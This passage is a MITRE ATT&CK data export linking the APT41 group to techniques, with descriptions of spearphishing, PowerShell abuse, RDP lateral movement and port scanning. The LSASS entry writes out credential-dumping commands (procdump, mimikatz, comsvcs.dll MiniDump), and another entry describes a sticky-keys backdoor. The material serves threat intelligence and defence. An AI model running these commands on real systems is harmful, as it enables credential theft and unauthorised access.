2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--6160a359-35cc-4bbe-ac29-500f2751ed4b
revoked : False
technique : Spearphishing Attachment
technique_description : Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1566.001
matrix : mitre-attack
platform : ['macOS', 'Windows', 'Linux']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Application Log: Application Log Content', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to masquerade their files as popular anti-virus software.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--285baef5-e948-4e56-a078-5e7f5e7404fd
revoked : False
technique : Match Legitimate Name or Location
technique_description : Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Containers']
data_sources : ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Metadata', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims’ environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)
relationship_id : relationship--1aaecef9-d21a-420c-a6c0-53cca7a5e5d8
revoked : False
technique : PowerShell
technique_description : Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Script: Script Execution', 'Process: Process Creation', 'Process: Process Metadata', 'Command: Command Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged sticky keys to establish persistence.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--728c2a84-ac7d-4b17-a287-4c692d717065
revoked : False
technique : Accessibility Features
technique_description : Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)

* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1546.008
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Windows Registry: Windows Registry Key Modification']
permissions_required : ['Administrator']
effective_permissions : ['SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used hashdump, [Mimikatz](https://attack.mitre.org/software/S0002), and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--cbbbc655-e5a7-40e9-be62-7f29727b9f0c
revoked : False
technique : LSASS Memory
technique_description : Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)


Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Access', 'Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Process: OS API Execution', 'Logon Session: Logon Session Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used RDP for lateral movement.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--e7bcc9e7-d373-4b1e-a664-886c4fc04bc5
revoked : False
technique : Remote Desktop Protocol
technique_description : Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1021.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Creation', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Logon Session: Logon Session Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a malware variant called WIDETONE to conduct port scans on specified subnets.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--883558d8-c445-45cf-a5cd-841fdf49f311
revoked : False
technique : Network Service Discovery
technique_description : Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1046
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Cloud Service: Cloud Service Enumeration']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
